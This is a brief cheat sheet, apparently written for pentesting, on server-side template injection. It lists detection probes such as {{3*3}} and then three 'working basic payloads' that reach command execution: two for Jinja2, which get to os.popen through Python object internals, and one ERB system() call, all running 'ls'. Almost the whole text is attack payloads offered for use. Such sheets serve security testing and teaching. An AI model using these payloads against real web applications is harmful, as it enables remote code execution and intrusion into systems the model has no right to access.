SSTI

Checking for SSTI:

{{3*3}}

<%= 3 * 3 %>

${{3*3}}

Working basic payloads

{{"foo".class.base.subclasses()[182].init.globals['sys'].modules['os'].popen("ls").read()}}

<%= system("ls") %>

"{{ self.__init__.__globals__.__builtins__.__import__('os').popen('ls').read() }}"